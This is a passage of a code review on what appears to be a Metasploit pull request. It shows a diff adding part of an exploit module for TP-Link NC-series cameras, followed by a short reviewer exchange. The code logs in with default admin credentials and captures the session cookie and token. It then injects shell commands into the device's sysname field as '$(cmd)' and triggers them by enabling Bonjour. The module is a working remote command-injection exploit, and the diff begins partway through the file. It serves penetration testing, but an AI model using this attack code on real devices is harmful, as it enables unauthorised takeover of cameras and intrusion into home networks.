modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb

```diff
@@ -0,0 +1,232 @@
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'TP-Link NC260, NC450',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the HTTP Server to wait for the ELF payload request', 60])
+      ])
+  end
+
+  def login
+    user = datastore['USERNAME']
+    pass = Base64.strict_encode64(datastore['PASSWORD'])
+    if target.name == 'TP-Link NC260, NC450'
+      pass=Rex::Text.md5(pass)
+    end
+    
+    print_status("Authenticating with #{user}:#{pass} ...")
+    begin
+      res= send_request_cgi({
+        'uri' => '/login.fcgi',
+        'method' => 'POST',
+        'vars_post' => {
+          "Username" => user,
+          "Password" => pass,
+        }
+      })
+      if res.nil? or res.code == 404
+        fail_with(Failure::NoAccess, "/login.fcgi did not reply correctly. Wrong target ip?")
+      end
+      if res.body =~ /\"errorCode\"\:0/ and res.headers.key?('Set-Cookie') and res.body =~ /token/
+        print_good("Logged-in as #{user}")
+        @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
+        print_good("Got cookie: #{@cookie}")
+        @token = res.body.scan(/"(token)":"([^,"]*)"/)[0][1]
+        print_good("Got token: #{@token}")
+      else
+        fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+  end
+
+  def enableBonjour()
+    begin
+      res = send_request_cgi({
+        'uri'    => '/setbonjoursetting.fcgi',
+        'method' => 'POST',
+        'encode_params' => false,
+        'cookie' => "sess=#{@cookie}",
+        'vars_post' => {
+          "bonjourState" => "1",
+          "token" => "#{@token}"
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+      return nil
+    end
+  end
+
+  def execute(cmd)
+    setSysName("$(#{cmd})")
+    enableBonjour()
+  end
+
+  def setSysName(cmd)
+    begin
+      res = send_request_cgi({
+        'uri'    => '/setsysname.fcgi',
+        'method' => 'POST',
+        'encode_params' => false,
+        'cookie' => "sess=#{@cookie}",
+        'vars_post' => {
+          "sysname" => "#{cmd}",
+          "token" => "#{@token}"
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+      return nil
+    end
+  end
```

Comment:
Same suggestion here as with the `enableBonjour()` method.

Reply:
done:
https://github.com/rapid7/metasploit-framework/pull/14135/commits/963a4d29eca40763662c63e7c79d02fc417fb51d